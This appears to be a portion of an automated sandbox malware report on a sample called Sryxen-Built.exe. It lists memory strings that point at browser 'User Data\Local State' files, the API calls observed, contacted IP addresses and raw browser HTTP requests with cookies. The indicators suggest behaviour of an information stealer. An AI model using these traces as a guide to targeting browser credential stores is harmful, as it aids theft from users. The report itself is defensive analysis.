Source: Binary string: winload_prod.pdbetlb source: Sryxen-Built.exe, 00000000.00000003.1251249271.0000018D4620C000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250975899.0000018D46202000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250735027.0000018D461FF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1251150907.0000018D4620B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbrate\StagedAssets\User Data\Local Statedobe.Z source: Sryxen-Built.exe, 00000000.00000003.1228120785.0000018D4626B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227727003.0000018D46267000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2*\*el source: Sryxen-Built.exe, 00000000.00000003.1242868327.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1243044695.0000018D4624F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831story source: Sryxen-Built.exe, 00000000.00000003.1227554283.0000018D46269000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1228120785.0000018D4626B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227428811.0000018D46264000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227402785.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227568090.0000018D4626D000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1228698272.0000018D4626E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227727003.0000018D46267000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*Stateh source: Sryxen-Built.exe, 00000000.00000003.1242964645.0000018D46206000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: Sryxen-Built.exe, 00000000.00000003.1250975899.0000018D46202000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1238412396.0000018D4624C000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250735027.0000018D461FF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1240056461.0000018D4624E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1228120785.0000018D4626B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1231680659.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1232302461.0000018D46251000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1237183020.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1242868327.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1231900601.0000018D46250000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1236483615.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1243044695.0000018D4624F000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1228698272.0000018D4626E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227727003.0000018D46267000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdb source: Sryxen-Built.exe, 00000000.00000003.1242868327.0000018D46242000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb.jfmvernedChannelStates.jsonINp source: Sryxen-Built.exe, 00000000.00000003.1228166392.0000018D46242000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbsesate source: Sryxen-Built.exe, 00000000.00000002.1489431988.0000018D4621A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2Bates source: Sryxen-Built.exe, 00000000.00000003.1231680659.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1232302461.0000018D46251000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1231900601.0000018D46250000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\User Data\Local StateeesY source: Sryxen-Built.exe, 00000000.00000003.1250357192.0000018D46263000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250408868.0000018D46274000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250254001.0000018D46259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ate source: Sryxen-Built.exe, 00000000.00000003.1238412396.0000018D4624C000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1240056461.0000018D4624E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1237183020.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1236483615.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb*eK source: Sryxen-Built.exe, 00000000.00000003.1255310974.0000018D46243000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1247984734.0000018D46250000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250975899.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1251705885.0000018D46252000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1248626143.0000018D46253000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1251249271.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1248168816.0000018D46252000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1256025863.0000018D4624F000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1254378340.0000018D46243000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1261036800.0000018D4624F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D4625D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbefoxy source: Sryxen-Built.exe, 00000000.00000003.1243118243.0000018D4621E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1242964645.0000018D46216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\User Data\Local StateteStateI source: Sryxen-Built.exe, 00000000.00000003.1250357192.0000018D46263000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250408868.0000018D46274000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250254001.0000018D46259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2*t\*w source: Sryxen-Built.exe, 00000000.00000003.1238412396.0000018D4624C000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1240056461.0000018D4624E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1237183020.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1236483615.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\* source: Sryxen-Built.exe, 00000000.00000003.1243118243.0000018D4621E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1242964645.0000018D46216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Sryxen-Built.exe, 00000000.00000003.1228120785.0000018D4626B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227727003.0000018D46267000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\User Data source: Sryxen-Built.exe, 00000000.00000003.1238559982.0000018D46272000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1236897944.0000018D46271000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D46271000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local Stateemp\*^ source: Sryxen-Built.exe, 00000000.00000003.1247757547.0000018D46214000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1247984734.0000018D4621D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State source: Sryxen-Built.exe, 00000000.00000003.1250357192.0000018D46263000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250254001.0000018D46259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\te source: Sryxen-Built.exe, 00000000.00000003.1250695897.0000018D4625C000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1251212121.0000018D4625D000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250254001.0000018D46259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2**q source: Sryxen-Built.exe, 00000000.00000003.1228120785.0000018D4626B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1228698272.0000018D4626E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227727003.0000018D46267000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: Sryxen-Built.exe, 00000000.00000003.1242868327.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1243044695.0000018D4624F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831al Statee\ source: Sryxen-Built.exe, 00000000.00000003.1231680659.0000018D46223000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1230970491.0000018D46219000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1231180277.0000018D46221000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\User Data\Local StateState source: Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D46221000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1238279916.0000018D46223000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbtatekageK source: Sryxen-Built.exe, 00000000.00000003.1250975899.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1251249271.0000018D46242000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2*e\*_ source: Sryxen-Built.exe, 00000000.00000003.1227554283.0000018D46269000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1228120785.0000018D4626B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227428811.0000018D46264000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227402785.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227568090.0000018D4626D000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1228698272.0000018D4626E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227727003.0000018D46267000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local Stateaate source: Sryxen-Built.exe, 00000000.00000003.1247669206.0000018D4627D000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1247609444.0000018D46259000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1248402570.0000018D4627F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdblnkbL( source: Sryxen-Built.exe, 00000000.00000003.1248728348.0000018D461F8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State*` source: Sryxen-Built.exe, 00000000.00000003.1250630261.0000018D4626A000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250357192.0000018D46263000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250254001.0000018D46259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D4625D000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227446361.0000018D46219000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1231861284.0000018D46215000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1231270289.0000018D46214000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1309358098.0000018D46284000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2es\*0 source: Sryxen-Built.exe, 00000000.00000003.1228120785.0000018D4626B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1228698272.0000018D4626E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227727003.0000018D46267000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb3870112724rsegmnoittet-es.files source: Sryxen-Built.exe, 00000000.00000003.1243135675.0000018D46216000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1242964645.0000018D46216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local Statees\*D source: Sryxen-Built.exe, 00000000.00000003.1250357192.0000018D46263000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250254001.0000018D46259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2tate_] source: Sryxen-Built.exe, 00000000.00000003.1309358098.0000018D46284000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1310208514.0000018D4628E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1310513841.0000018D4628F000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1310086274.0000018D46285000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831r\*? source: Sryxen-Built.exe, 00000000.00000003.1250975899.0000018D46202000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250735027.0000018D461FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*epc source: Sryxen-Built.exe, 00000000.00000002.1489431988.0000018D4621A000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6E8A8C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,0_2_00007FF67B6E8A8C
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6E89AC FindClose,FindFirstFileExW,GetLastError,0_2_00007FF67B6E89AC
Source: chrome.exeMemory has grown: Private usage: 20MB later: 33MB
Source: Joe Sandbox ViewIP Address: 23.44.201.15 23.44.201.15
Source: Joe Sandbox ViewIP Address: 52.182.143.214 52.182.143.214
Source: Joe Sandbox ViewIP Address: 2.22.242.11 2.22.242.11
Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.73
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.73
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.73
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.25
Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.25
Source: unknownTCP traffic detected without corresponding DNS query: 52.231.230.148
Source: unknownTCP traffic detected without corresponding DNS query: 52.231.230.148
Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.25
Source: unknownTCP traffic detected without corresponding DNS query: 52.231.230.148
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.37
Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.37
Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.37
Source: unknownTCP traffic detected without corresponding DNS query: 108.138.128.56
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B4F9BA0 recv,recv,htons,recv,recv,recv,0_2_00007FF67B4F9BA0
Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.867cdfd625d830718faf.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-viewport-height: 874sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.5sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=A8317C49E1884F1E947B8F0BC3E99881.RefC=2025-03-08T23:43:37Z; USRLOC=; MUID=0815C547F66A6ADB3C0FD0EEF7EC6BB9; MUIDB=0815C547F66A6ADB3C0FD0EEF7EC6BB9; _EDGE_S=F=1&SID=053C93CE852E60321C77866784FF61EE; _EDGE_V=1
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.948ffa5ea2d441a35f55.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.45sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 450sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 3gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=A8317C49E1884F1E947B8F0BC3E99881.RefC=2025-03-08T23:43:37Z; USRLOC=; MUID=0815C547F66A6ADB3C0FD0EEF7EC6BB9; MUIDB=0815C547F66A6ADB3C0FD0EEF7EC6BB9; _EDGE_S=F=1&SID=053C93CE852E60321C77866784FF61EE; _EDGE_V=1
